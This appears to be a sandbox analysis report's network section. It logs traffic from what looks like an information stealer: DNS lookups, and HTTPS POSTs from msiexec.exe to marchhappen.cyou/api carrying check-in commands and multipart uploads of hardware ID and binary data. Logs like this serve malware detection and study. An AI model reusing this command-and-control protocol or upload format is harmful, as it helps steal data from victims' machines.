                                                                                            Nov 25, 2024 10:54:33.387330055 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.387466908 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:33.387480021 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.691224098 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.691302061 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.696926117 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.696948051 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.697148085 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:34.698087931 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.698187113 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:34.698220968 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.467277050 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.467376947 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.467475891 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.467744112 CET49739443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.467775106 CET44349739104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.787775993 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.787846088 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:35.787938118 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.788294077 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:35.788305998 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.092912912 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.092993975 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.094238043 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.094249010 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.094464064 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.095954895 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.096091032 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.096117973 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:37.096172094 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:37.096180916 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:38.161564112 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:38.161663055 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:38.161714077 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:38.161782026 CET49740443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:38.161798954 CET44349740104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:39.517400026 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:39.517457008 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:39.517553091 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:39.517822981 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:39.517839909 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.740781069 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.740866899 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.744014025 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.744023085 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.744412899 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:40.745654106 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.745726109 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:40.745731115 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:42.656133890 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:42.656349897 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:42.656404972 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:42.656649113 CET49741443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:42.656671047 CET44349741104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:43.241756916 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:43.241808891 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:43.242517948 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:43.242784023 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:43.242794037 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.455732107 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.455907106 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.491202116 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.491229057 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.491672993 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.495927095 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.506366014 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.506432056 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.506746054 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.506778002 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.510577917 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.510629892 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.511866093 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.511909962 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.514605999 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.514647007 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515363932 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.515403986 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515412092 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.515424967 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515574932 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.515602112 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.515633106 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.518601894 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.518640041 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.559329033 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562683105 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562720060 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562742949 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562762976 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562784910 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562797070 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:44.562819004 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:44.562824965 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.729223967 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.729501963 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.729748011 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.729821920 CET49743443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.729851007 CET44349743104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.771301031 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.771368980 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:46.771447897 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.771744967 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:46.771763086 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.033611059 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.033683062 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.035320997 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.035326958 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.035521030 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.036700010 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.036721945 CET49755443192.168.2.4104.21.2.224
                                                                                            Nov 25, 2024 10:54:48.036746979 CET44349755104.21.2.224192.168.2.4
                                                                                            Nov 25, 2024 10:54:48.760832071 CET44349755104.21.2.224192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 25, 2024 10:54:25.534615040 CET | 63148 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 10:54:25.869096041 CET | 53 | 63148 | 1.1.1.1 | 192.168.2.4
Nov 25, 2024 10:54:48.764528036 CET | 56157 | 53 | 192.168.2.4 | 1.1.1.1
Nov 25, 2024 10:54:48.902173042 CET | 53 | 56157 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 25, 2024 10:54:25.534615040 CET | 192.168.2.4 | 1.1.1.1 | 0x5120 | Standard query (0) | marchhappen.cyou | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:54:48.764528036 CET | 192.168.2.4 | 1.1.1.1 | 0x818d | Standard query (0) | rentry.co | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 25, 2024 10:54:25.869096041 CET | 1.1.1.1 | 192.168.2.4 | 0x5120 | No error (0) | marchhappen.cyou |  | 104.21.2.224 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:54:25.869096041 CET | 1.1.1.1 | 192.168.2.4 | 0x5120 | No error (0) | marchhappen.cyou |  | 172.67.129.193 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:54:48.902173042 CET | 1.1.1.1 | 192.168.2.4 | 0x818d | No error (0) | rentry.co |  | 172.67.75.40 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:54:48.902173042 CET | 1.1.1.1 | 192.168.2.4 | 0x818d | No error (0) | rentry.co |  | 104.26.3.16 | A (IP address) | IN (0x0001) | false
Nov 25, 2024 10:54:48.902173042 CET | 1.1.1.1 | 192.168.2.4 | 0x818d | No error (0) | rentry.co |  | 104.26.2.16 | A (IP address) | IN (0x0001) | false
                                                                                            • marchhappen.cyou
                                                                                            • rentry.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49736 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:27 UTC | 263 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8
                                                                                            Host: marchhappen.cyou
2024-11-25 09:54:27 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
                                                                                            Data Ascii: act=life
2024-11-25 09:54:27 UTC | 1007 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=ti413q86av6eo8jalc49gqg6rf; expires=Fri, 21-Mar-2025 03:41:06 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fWXpWVHKUb7gOSALH%2BEJWNMYxAMYFcTVQzmfV9q4dMqnOTTvHVYXPzLcRTCB2q2P3TEt6lBAmyrecUMpCh9h29H%2BwmRkH79cIonOFww9uFerhnq3P8RrEI6MD6mZccfZJ%2F0E"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c1e9ae2342d2-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1748&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1675272&cwnd=227&unsent_bytes=0&cid=b1991bda46d070c2&ts=733&x=0"
2024-11-25 09:54:27 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-11-25 09:54:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49737 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:29 UTC | 264 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 49
                                                                                            Host: marchhappen.cyou
2024-11-25 09:54:29 UTC | 49 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 26 6a 3d
                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=MeHdy4--pl8vs06&j=
2024-11-25 09:54:30 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=faucnbpt3nas5jobj0cpkmtijf; expires=Fri, 21-Mar-2025 03:41:09 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=He95gKQnpYiFfuVBMaTgWpaqok3wLlsCya8Ytjr9s9UC4CJtg2fMS8bvsrah%2FqhVR3DeXcFk6ZmP3U8h%2B81WkfJ5tvV3%2BaQ7Lu24WMRrPiQVDolHfJKR0L%2Bcuowh7XUbBLlg"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c1fa598e431f-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2152&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=949&delivery_rate=1340064&cwnd=248&unsent_bytes=0&cid=d93d5ac60b23598b&ts=764&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:32 UTC | 275 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=604ZQ9UOTHV
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 18123
                                                                                            Host: marchhappen.cyou
2024-11-25 09:54:32 UTC | 15331 | OUT | Data Raw: 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 36 30 34 5a 51 39 55 4f 54 48 56 0d 0a 43 6f
                                                                                            Data Ascii: --604ZQ9UOTHVContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--604ZQ9UOTHVContent-Disposition: form-data; name="pid"2--604ZQ9UOTHVContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--604ZQ9UOTHVCo
2024-11-25 09:54:33 UTC | 1012 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=m86mbu1scodu3ckshi74ltthcs; expires=Fri, 21-Mar-2025 03:41:11 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RekKRFPDEhpFBujxVk02LYryOb%2BDtRt5MZDkTDs7rW8QoX3rvHSV0DAAMO7MMRZBIKWS20KXzhqo1LgIybVqk6K%2BkhF3zudi7RhNv2R5yym4AGg8PvgxIDF7%2BIXVS%2BNzvi9g"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c208ea93c331-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1749&sent=18&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=19078&delivery_rate=1611479&cwnd=74&unsent_bytes=0&cid=b7154dc0b3333836&ts=885&x=0"
2024-11-25 09:54:33 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-25 09:54:33 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:34 UTC | 272 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=WAFYLO6NK
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8732
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:34 UTC8732OUTData Raw: 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 57 41 46 59 4c 4f 36 4e 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                            Data Ascii: --WAFYLO6NKContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--WAFYLO6NKContent-Disposition: form-data; name="pid"2--WAFYLO6NKContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--WAFYLO6NKContent-Di
2024-11-25 09:54:35 UTC | 1009 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:35 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=7gkdgcpjutit7122illi15qtj8; expires=Fri, 21-Mar-2025 03:41:14 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uuJIGxNBIbE09Kb7eXtABJZyfJAHZapY9DhFgM0mofiHmNnl94HR6jkd%2BckLcwJgq7%2FgpEJtCuKgVsVEo8voeqg4vJeYx6RJbjghwqj%2BHlk7MkgidLY9jqLKj8R7I7tVID4i"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8e80c217ebaac43b-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&sent=9&recv=16&lost=0&retrans=0&sent_bytes=2840&recv_bytes=9662&delivery_rate=1795817&cwnd=187&unsent_bytes=0&cid=2412da6721e80d9f&ts=780&x=0"
2024-11-25 09:54:35 UTC | 19 | IN | Data Raw: 65 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 37 35 0d 0a
Data Ascii: eok 8.46.123.75
2024-11-25 09:54:35 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 104.21.2.224 | 443 | 2232 | C:\Windows\SysWOW64\msiexec.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 09:54:37 UTC | 274 | OUT | POST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=AWZPLICSBP
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20391
                                                                                            Host: marchhappen.cyou
                                                                                            2024-11-25 09:54:37 UTC15331OUTData Raw: 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 38 41 32 32 36 38 41 34 32 31 37 46 46 34 38 32 33 41 37 46 44 44 43 39 35 42 33 43 33 36 41 0d 0a 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4d 65 48 64 79 34 2d 2d 70 6c 38 76 73 30 36 0d 0a 2d 2d 41 57 5a 50 4c 49 43 53 42 50 0d 0a 43 6f 6e 74 65 6e
                                                                                            Data Ascii: --AWZPLICSBPContent-Disposition: form-data; name="hwid"58A2268A4217FF4823A7FDDC95B3C36A--AWZPLICSBPContent-Disposition: form-data; name="pid"3--AWZPLICSBPContent-Disposition: form-data; name="lid"MeHdy4--pl8vs06--AWZPLICSBPConten
                                                                                            2024-11-25 09:54:37 UTC5060OUTData Raw: 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0
                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO@d
2024-11-25 09:54:38 UTC | 1015 | IN | HTTP/1.1 200 OK
                                                                                            Date: Mon, 25 Nov 2024 09:54:37 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=las9891j4slphbrm0e9399jgbj; expires=Fri, 21-Mar-2025 03:41:16 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
